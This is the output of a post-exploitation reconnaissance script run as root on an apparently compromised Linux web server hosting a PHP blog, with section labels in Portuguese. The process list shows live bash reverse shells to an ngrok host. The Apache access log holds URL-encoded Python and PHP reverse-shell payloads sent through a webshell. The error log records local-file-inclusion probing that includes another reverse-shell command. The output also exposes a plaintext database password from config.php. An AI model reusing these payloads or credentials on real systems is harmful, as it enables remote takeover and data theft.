[*] Salvando resultados em: recon_parte2_20260310_104657.txt


==================== Início: Tue Mar 10 10:46:57 -03 2026 ====================



==================== 1. Informações básicas do host ====================

--- hostname ---
ip-10-0-2-10

--- uname -a ---
Linux ip-10-0-2-10 6.8.0-1021-aws #23-Ubuntu SMP Mon Dec  9 23:59:34 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

--- whoami / id ---
root
uid=0(root) gid=0(root) groups=0(root)

--- /etc/hosts ---
127.0.0.1 localhost

# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts


==================== 2. Rede interna (IPs, rotas, ARP) ====================

--- IPs (hostname -I) ---
10.0.2.10 172.17.0.1 

--- /proc/net/dev ---
Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
    lo:   23275     250    0    0    0     0          0         0    23275     250    0    0    0     0       0          0
  ens5: 2038277    2373    0    0    0     0          0         0   125186    1135    0    0    0     0       0          0
docker0:       0       0    0    0    0     0          0         0        0       0    0    0    0     0       0          0

--- /sys/class/net ---
total 0
drwxr-xr-x  2 root root 0 Mar 10 10:46 .
drwxr-xr-x 71 root root 0 Mar 10 10:24 ..
lrwxrwxrwx  1 root root 0 Mar 10 10:43 docker0 -> ../../devices/virtual/net/docker0
lrwxrwxrwx  1 root root 0 Mar 10 10:43 ens5 -> ../../devices/pci0000:00/0000:00:05.0/net/ens5
lrwxrwxrwx  1 root root 0 Mar 10 10:43 lo -> ../../devices/virtual/net/lo

--- Rotas (/proc/net/route) ---
Iface   Destination     Gateway         Flags   RefCnt  Use     Metric  Mask            MTU     Window  IRTT                                                       
ens5    00000000        0100000A        0003    0       0       100     00000000        0       0       0                                                                             
ens5    0000000A        00000000        0001    0       0       100     0000FFFF        0       0       0                                                                             
ens5    0100000A        00000000        0005    0       0       100     FFFFFFFF        0       0       0                                                                             
ens5    0200000A        00000000        0005    0       0       100     FFFFFFFF        0       0       0                                                                             
docker0 000011AC        00000000        0001    0       0       0       0000FFFF        0       0       0                                                                            

--- /proc/net/arp ---
IP address       HW type     Flags       HW address            Mask     Device
10.0.0.2         0x1         0x2         02:0c:29:59:ff:8f     *        ens5
10.0.0.1         0x1         0x2         02:0c:29:59:ff:8f     *        ens5
[*] IP interno detectado: 10.0.2.10 (prefixo 10.0.2.0/24)


==================== 3. Conexões de rede ativas ====================

--- /proc/net/tcp ---
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     
   0: 0100007F:8124 00000000:0000 0A 00000000:00000000 00:00000000 00000000   100        0 9200 1 0000000000000000 100 0 0 10 0                      
   1: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   991        0 4581 1 0000000000000000 100 0 0 10 5                      
   2: 00000000:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   100        0 9618 1 0000000000000000 100 0 0 10 0                      
   3: 3600007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   991        0 4583 1 0000000000000000 100 0 0 10 5                      
   4: 0A02000A:BFC2 3C52E412:37D5 01 000001C3:00000000 01:0000001B 00000000    33        0 10457 2 0000000000000000 32 4 31 10 -1                    

--- /proc/net/udp ---
   sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops            
  193: 3600007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000   991        0 4582 2 0000000000000000 0          
  193: 3500007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000   991        0 4580 2 0000000000000000 0          
  208: 0A02000A:0044 00000000:0000 07 00000000:00000000 00:00000000 00000000   998        0 4932 2 0000000000000000 0          
  463: 0100007F:0143 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 6144 2 0000000000000000 0          

--- Processos com rede (ps aux | grep -E 'ssh|mysql|nginx|curl|wget|python|php') ---
mysql         66  0.0  0.0   2800   896 ?        S    10:26   0:00 /bin/sh /usr/bin/mysqld_safe
mysql        225  0.6 38.3 1787524 360888 ?      Sl   10:26   0:08 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --log-error=/var/log/mysql/error.log --pid-file=ip-10-0-2-10.pid
www-data     352  0.0  0.5  15264  5376 pts/1    S+   10:36   0:00 python3 -c import pty; pty.spawn("/bin/bash")


==================== 4. Varredura simples do /24 interno (ping + portas 22/80/443/3306/8080) ====================

Subrede alvo: 10.0.2.0/24



==================== 5. Serviços locais (Apache, MySQL, etc.) ====================

--- Processos (ps aux | head -80) ---
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.1   4588  1536 pts/0    Ss+  10:26   0:00 bash
root          26  0.0  0.9 203872  9000 ?        Ss   10:26   0:00 /usr/sbin/apache2 -k start
www-data      43  0.0  1.1 204496 11204 ?        S    10:26   0:00 /usr/sbin/apache2 -k start
www-data      44  0.0  1.1 204480 10692 ?        S    10:26   0:00 /usr/sbin/apache2 -k start
www-data      45  0.0  1.1 204496 11204 ?        S    10:26   0:00 /usr/sbin/apache2 -k start
www-data      46  0.0  1.2 204496 11332 ?        S    10:26   0:00 /usr/sbin/apache2 -k start
www-data      47  0.0  1.2 204504 11972 ?        S    10:26   0:00 /usr/sbin/apache2 -k start
mysql         66  0.0  0.0   2800   896 ?        S    10:26   0:00 /bin/sh /usr/bin/mysqld_safe
mysql        225  0.6 38.3 1787524 360888 ?      Sl   10:26   0:08 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --log-error=/var/log/mysql/error.log --pid-file=ip-10-0-2-10.pid
www-data     339  0.0  0.7 204456  7492 ?        S    10:35   0:00 /usr/sbin/apache2 -k start
www-data     340  0.0  0.0   2800   768 ?        S    10:35   0:00 sh -c -- bash -c 'bash -i >& /dev/tcp/0.tcp.sa.ngrok.io/14293 0>&1'
www-data     341  0.0  0.1   4324  1024 ?        S    10:35   0:00 bash -c bash -i >& /dev/tcp/0.tcp.sa.ngrok.io/14293 0>&1
www-data     342  0.0  0.1   4588  1408 ?        S    10:35   0:00 bash -i
www-data     346  0.0  0.7 204456  7364 ?        S    10:35   0:00 /usr/sbin/apache2 -k start
www-data     348  0.0  0.0   2716   896 ?        S    10:35   0:00 script -qc /bin/bash /dev/null
www-data     349  0.0  0.0   2800   896 pts/1    Ss   10:36   0:00 sh -c /bin/bash
www-data     350  0.0  0.1   4588  1408 pts/1    S    10:36   0:00 /bin/bash
www-data     352  0.0  0.5  15264  5376 pts/1    S+   10:36   0:00 python3 -c import pty; pty.spawn("/bin/bash")
www-data     353  0.0  0.1   4972  1280 pts/2    Ss   10:36   0:00 /bin/bash
root         359  0.0  0.1   7108  1596 pts/2    S    10:38   0:00 su adalberto
adalber+     360  0.0  0.2   5020  2816 pts/2    S    10:38   0:00 bash
root         407  0.0  0.4   7164  4480 pts/2    S    10:44   0:00 su 0xdtc
root         408  0.0  0.4   5016  3968 pts/2    S    10:44   0:00 bash
root         417 25.0  0.3   4884  3328 pts/2    S+   10:46   0:00 /bin/bash ./explorarparte1.sh
root         713  0.0  0.4   8332  4352 pts/2    R+   10:46   0:00 ps aux
root         714  0.0  0.1   3136  1664 pts/2    S+   10:46   0:00 head -80

--- Apache config (sites-enabled) ---
total 8
drwxr-xr-x 1 root root 4096 Jan 15 10:56 .
drwxr-xr-x 1 root root 4096 Jan  7 19:09 ..
lrwxrwxrwx 1 root root   35 Jan  7 19:09 000-default.conf -> ../sites-available/000-default.conf
>> /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/blogo

        <Directory "/var/www/blogo/files">
            Require local
        </Directory>

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

--- /var/www ---
total 24
drwxr-xr-x 1 root root 4096 Jan 14 14:24 .
drwxr-xr-x 1 root root 4096 Jan  7 19:05 ..
drwxrwxrwx 1 root root 4096 Mar 10 10:42 blogo
drwxr-xr-x 2 root root 4096 Jan  7 19:09 html

--- /var/www/blogo ---
total 832
drwxrwxrwx 1 root      root        4096 Mar 10 10:42 .
drwxr-xr-x 1 root      root        4096 Jan 14 14:24 ..
-rwxrwxr-x 1 adalberto adalberto   2837 Mar 10 10:42 CVE.sh
-rw-r--r-- 1 www-data  www-data  312917 Jan 13 18:38 aetherpharma.png
-rw-r--r-- 1 www-data  www-data     580 Jan 14 23:19 back.zip
drwxr-xr-x 2 www-data  www-data    4096 Jan 14 23:39 config
-rw-r--r-- 1 www-data  www-data  466106 Jan 13 18:38 festas-ano-novo.png
drwxrwxrwx 2 www-data  www-data    4096 Jan 15 11:54 files
-rw-r--r-- 1 www-data  www-data    7988 Jan 16 03:01 index.html
-rw-r--r-- 1 www-data  www-data   12408 Jan 15 12:55 noticias.php
-rw-r--r-- 1 www-data  www-data     105 Mar 10 10:35 rev.php
-rw-r----- 1 mysql     mysql         55 Jan 15 12:27 shell.php
-rw-r----- 1 www-data  root        2588 Jan 15 11:57 test.php
-rw-r----- 1 mysql     mysql          5 Jan 15 12:16 test.txt

--- /var/www/blogo/config ---
total 12
drwxr-xr-x 2 www-data www-data 4096 Jan 14 23:39 .
drwxrwxrwx 1 root     root     4096 Mar 10 10:42 ..
-rw-r--r-- 1 www-data www-data  739 Jan 14 23:08 config.php

--- /var/www/blogo/config/config.php ---
<?php
// config.php
declare(strict_types=1);

/**
 * Store this file outside your web root if possible (e.g., /var/www/config/config.php)
 * and restrict permissions (e.g., chmod 640).
 */

return [
    'db' => [
        'driver'  => 'mysql',
        'host'    => '127.0.0.1',
        'port'    => 3306,

        // If your database name is different, change this value:
        'name'    => 'blogodb',

        'user'    => 'blogodb',
        'pass'    => 'WPcmqw16ZmzO!5paSC4',

        'charset' => 'utf8mb4',
        'options' => [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
            PDO::ATTR_EMULATE_PREPARES   => false,
        ],
    ],
];


--- MySQL (se disponível, info básica) ---
host    port
ip-10-0-2-10    3306
Database
information_schema
performance_schema


==================== 6. Logs relevantes (Apache, abaixo, outros) ====================

--- /var/log/apache2/access.log (últimas 200 linhas) ---

87.121.84.46 - - [16/Jan/2026:03:10:32 -0300] "GET / HTTP/1.1" 200 8242 "-" "-"
40.76.124.166 - - [16/Jan/2026:03:13:14 -0300] "GET / HTTP/1.1" 200 2783 "-" "Mozilla/5.0 zgrab/0.x"
20.127.202.128 - - [16/Jan/2026:03:13:15 -0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"
179.54.201.149 - - [10/Mar/2026:10:35:47 -0300] "GET /shell.php?cmd=whoami HTTP/1.1" 200 156 "-" "curl/8.18.0"
179.54.201.149 - - [10/Mar/2026:10:35:50 -0300] "GET /shell.php?cmd=python3+-c+%27import+socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%5C%220.tcp.sa.ngrok.io%5C%22%2C14293%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bsubprocess.call%28%5B%5C%22/bin/bash%5C%22%2C%5C%22-i%5C%22%5D%29%27 HTTP/1.1" 200 147 "-" "curl/8.18.0"
179.54.201.149 - - [10/Mar/2026:10:35:52 -0300] "GET /shell.php?cmd=printf+%27%3C%3Fphp%0A%24sock%3Dfsockopen%28%5C%220.tcp.sa.ngrok.io%5C%22%2C14293%29%3B%0Aif%28%24sock%29%7B%0A+exec%28%5C%22/bin/bash+-i+%3C%263+%3E%263+2%3E%263%5C%22%29%3B%0A%7D%0A%3F%3E%27+%3E+/var/www/blogo/rev.php HTTP/1.1" 200 147 "-" "curl/8.18.0"
179.54.201.149 - - [10/Mar/2026:10:35:53 -0300] "GET /rev.php HTTP/1.1" 500 185 "-" "curl/8.18.0"

--- /var/log/apache2/error.log (últimas 100 linhas) ---
[Thu Jan 15 11:27:20.542000 2026] [php:warn] [pid 1425] [client 172.17.0.1:59094] PHP Warning:  include(): Failed opening 'files/../files/~operator.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.542168 2026] [php:warn] [pid 1477] [client 172.17.0.1:58742] PHP Warning:  include(files/../files/~sysadm): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.542176 2026] [php:warn] [pid 1477] [client 172.17.0.1:58742] PHP Warning:  include(): Failed opening 'files/../files/~sysadm' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.542479 2026] [php:warn] [pid 1467] [client 172.17.0.1:58940] PHP Warning:  include(files/../files/~guest.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.542491 2026] [php:warn] [pid 1467] [client 172.17.0.1:58940] PHP Warning:  include(): Failed opening 'files/../files/~guest.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.544612 2026] [php:warn] [pid 1436] [client 172.17.0.1:59076] PHP Warning:  include(files/../files/~joe): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.544645 2026] [php:warn] [pid 1436] [client 172.17.0.1:59076] PHP Warning:  include(): Failed opening 'files/../files/~joe' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545148 2026] [php:warn] [pid 1475] [client 172.17.0.1:58820] PHP Warning:  include(files/../files/~httpd.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545150 2026] [php:warn] [pid 1443] [client 172.17.0.1:58880] PHP Warning:  include(files/../files/~www.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545157 2026] [php:warn] [pid 1475] [client 172.17.0.1:58820] PHP Warning:  include(): Failed opening 'files/../files/~httpd.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545160 2026] [php:warn] [pid 1443] [client 172.17.0.1:58880] PHP Warning:  include(): Failed opening 'files/../files/~www.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545617 2026] [php:warn] [pid 1455] [client 172.17.0.1:59126] PHP Warning:  include(files/../files/~www.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545625 2026] [php:warn] [pid 1455] [client 172.17.0.1:59126] PHP Warning:  include(): Failed opening 'files/../files/~www.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545909 2026] [php:warn] [pid 1477] [client 172.17.0.1:58742] PHP Warning:  include(files/../files/~tmp.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.545918 2026] [php:warn] [pid 1477] [client 172.17.0.1:58742] PHP Warning:  include(): Failed opening 'files/../files/~tmp.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546028 2026] [php:warn] [pid 1436] [client 172.17.0.1:59076] PHP Warning:  include(files/../files/~webmaster): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546041 2026] [php:warn] [pid 1436] [client 172.17.0.1:59076] PHP Warning:  include(): Failed opening 'files/../files/~webmaster' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546087 2026] [php:warn] [pid 1471] [client 172.17.0.1:59104] PHP Warning:  include(files/../files/~webmaster.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546096 2026] [php:warn] [pid 1471] [client 172.17.0.1:59104] PHP Warning:  include(): Failed opening 'files/../files/~webmaster.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546506 2026] [php:warn] [pid 1475] [client 172.17.0.1:58820] PHP Warning:  include(files/../files/~www): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546517 2026] [php:warn] [pid 1475] [client 172.17.0.1:58820] PHP Warning:  include(): Failed opening 'files/../files/~www' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546538 2026] [php:warn] [pid 1468] [client 172.17.0.1:59084] PHP Warning:  include(files/../files/~tmp.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.546547 2026] [php:warn] [pid 1468] [client 172.17.0.1:59084] PHP Warning:  include(): Failed opening 'files/../files/~tmp.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.547095 2026] [php:warn] [pid 1486] [client 172.17.0.1:59124] PHP Warning:  include(files/../files/~user): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.547104 2026] [php:warn] [pid 1486] [client 172.17.0.1:59124] PHP Warning:  include(): Failed opening 'files/../files/~user' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.547288 2026] [php:warn] [pid 1473] [client 172.17.0.1:58904] PHP Warning:  include(files/../files/~sys~.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.547296 2026] [php:warn] [pid 1473] [client 172.17.0.1:58904] PHP Warning:  include(): Failed opening 'files/../files/~sys~.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.547426 2026] [php:warn] [pid 1454] [client 172.17.0.1:58986] PHP Warning:  include(files/../files/~webmaster.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.547434 2026] [php:warn] [pid 1454] [client 172.17.0.1:58986] PHP Warning:  include(): Failed opening 'files/../files/~webmaster.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.548053 2026] [php:warn] [pid 1441] [client 172.17.0.1:58896] PHP Warning:  include(files/../files/~user.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.548062 2026] [php:warn] [pid 1441] [client 172.17.0.1:58896] PHP Warning:  include(): Failed opening 'files/../files/~user.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550140 2026] [php:warn] [pid 1471] [client 172.17.0.1:59104] PHP Warning:  include(files/../files/~sysadmin.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550154 2026] [php:warn] [pid 1471] [client 172.17.0.1:59104] PHP Warning:  include(): Failed opening 'files/../files/~sysadmin.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550203 2026] [php:warn] [pid 1467] [client 172.17.0.1:58940] PHP Warning:  include(files/../files/~test.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550212 2026] [php:warn] [pid 1467] [client 172.17.0.1:58940] PHP Warning:  include(): Failed opening 'files/../files/~test.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550377 2026] [php:warn] [pid 1436] [client 172.17.0.1:59076] PHP Warning:  include(files/../files/~sysadmin): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550386 2026] [php:warn] [pid 1436] [client 172.17.0.1:59076] PHP Warning:  include(): Failed opening 'files/../files/~sysadmin' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550745 2026] [php:warn] [pid 1458] [client 172.17.0.1:59138] PHP Warning:  include(files/../files/~test): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.550753 2026] [php:warn] [pid 1458] [client 172.17.0.1:59138] PHP Warning:  include(): Failed opening 'files/../files/~test' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.564942 2026] [php:warn] [pid 1477] [client 172.17.0.1:58742] PHP Warning:  include(files/../files/~test.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.564963 2026] [php:warn] [pid 1477] [client 172.17.0.1:58742] PHP Warning:  include(): Failed opening 'files/../files/~test.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578616 2026] [php:warn] [pid 1451] [client 172.17.0.1:58744] PHP Warning:  include(files/../files/~sysadm.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578637 2026] [php:warn] [pid 1451] [client 172.17.0.1:58744] PHP Warning:  include(): Failed opening 'files/../files/~sysadm.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578723 2026] [php:warn] [pid 1417] [client 172.17.0.1:58882] PHP Warning:  include(files/../files/~r): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578733 2026] [php:warn] [pid 1417] [client 172.17.0.1:58882] PHP Warning:  include(): Failed opening 'files/../files/~r' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578805 2026] [php:warn] [pid 1468] [client 172.17.0.1:59084] PHP Warning:  include(files/../files/~r.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578814 2026] [php:warn] [pid 1468] [client 172.17.0.1:59084] PHP Warning:  include(): Failed opening 'files/../files/~r.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578888 2026] [php:warn] [pid 1443] [client 172.17.0.1:58880] PHP Warning:  include(files/../files/~tmp): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.578897 2026] [php:warn] [pid 1443] [client 172.17.0.1:58880] PHP Warning:  include(): Failed opening 'files/../files/~tmp' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579226 2026] [php:warn] [pid 1485] [client 172.17.0.1:58970] PHP Warning:  include(files/../files/~user.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579233 2026] [php:warn] [pid 1485] [client 172.17.0.1:58970] PHP Warning:  include(): Failed opening 'files/../files/~user.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579521 2026] [php:warn] [pid 1471] [client 172.17.0.1:59104] PHP Warning:  include(files/../files/~r.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579530 2026] [php:warn] [pid 1471] [client 172.17.0.1:59104] PHP Warning:  include(): Failed opening 'files/../files/~r.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579546 2026] [php:warn] [pid 1455] [client 172.17.0.1:59126] PHP Warning:  include(files/../files/~sys~): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579547 2026] [php:warn] [pid 1438] [client 172.17.0.1:58912] PHP Warning:  include(files/../files/~sysadmin.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579555 2026] [php:warn] [pid 1455] [client 172.17.0.1:59126] PHP Warning:  include(): Failed opening 'files/../files/~sys~' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579557 2026] [php:warn] [pid 1438] [client 172.17.0.1:58912] PHP Warning:  include(): Failed opening 'files/../files/~sysadmin.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579965 2026] [php:warn] [pid 1441] [client 172.17.0.1:58896] PHP Warning:  include(files/../files/~sys~.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:27:20.579973 2026] [php:warn] [pid 1441] [client 172.17.0.1:58896] PHP Warning:  include(): Failed opening 'files/../files/~sys~.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:55:24.939443 2026] [php:warn] [pid 1443] [client 172.17.0.1:47834] PHP Warning:  include(files/../test.php): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:55:24.939488 2026] [php:warn] [pid 1443] [client 172.17.0.1:47834] PHP Warning:  include(): Failed opening 'files/../test.php' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:55:57.317224 2026] [php:warn] [pid 1447] [client 172.17.0.1:35686] PHP Warning:  Unknown: Failed to open stream: Permission denied in Unknown on line 0
[Thu Jan 15 11:55:57.317248 2026] [php:error] [pid 1447] [client 172.17.0.1:35686] PHP Fatal error:  Failed opening required '/var/www/blogo/test.php' (include_path='.:/usr/share/php') in Unknown on line 0
[Thu Jan 15 11:56:17.127694 2026] [php:warn] [pid 1473] [client 172.17.0.1:50992] PHP Warning:  include(files/../test.php?cmd=ls): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:56:17.127744 2026] [php:warn] [pid 1473] [client 172.17.0.1:50992] PHP Warning:  include(): Failed opening 'files/../test.php?cmd=ls' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:56:39.264168 2026] [php:warn] [pid 1477] [client 172.17.0.1:51488] PHP Warning:  include(files/../test.php?cmd=export RHOST=&quot;192.168.89.152&quot;;export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(&quot;RHOST&quot;),int(os.getenv(&quot;RPORT&quot;))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(&quot;sh&quot;)'): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:56:39.264189 2026] [php:warn] [pid 1477] [client 172.17.0.1:51488] PHP Warning:  include(): Failed opening 'files/../test.php?cmd=export RHOST=&quot;192.168.89.152&quot;;export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(&quot;RHOST&quot;),int(os.getenv(&quot;RPORT&quot;))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(&quot;sh&quot;)'' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 11:56:52.650836 2026] [php:warn] [pid 1451] [client 172.17.0.1:52242] PHP Warning:  Unknown: Failed to open stream: Permission denied in Unknown on line 0
[Thu Jan 15 11:56:52.650863 2026] [php:error] [pid 1451] [client 172.17.0.1:52242] PHP Fatal error:  Failed opening required '/var/www/blogo/test.php' (include_path='.:/usr/share/php') in Unknown on line 0
[Thu Jan 15 11:57:41.326704 2026] [php:warn] [pid 1481] [client 172.17.0.1:40142] PHP Warning:  Unknown: Failed to open stream: Permission denied in Unknown on line 0
[Thu Jan 15 11:57:41.326723 2026] [php:error] [pid 1481] [client 172.17.0.1:40142] PHP Fatal error:  Failed opening required '/var/www/blogo/test.php' (include_path='.:/usr/share/php') in Unknown on line 0
[Thu Jan 15 11:57:55.344562 2026] [php:warn] [pid 1466] [client 172.17.0.1:57744] PHP Warning:  Unknown: Failed to open stream: Permission denied in Unknown on line 0
[Thu Jan 15 11:57:55.344582 2026] [php:error] [pid 1466] [client 172.17.0.1:57744] PHP Fatal error:  Failed opening required '/var/www/blogo/test.php' (include_path='.:/usr/share/php') in Unknown on line 0
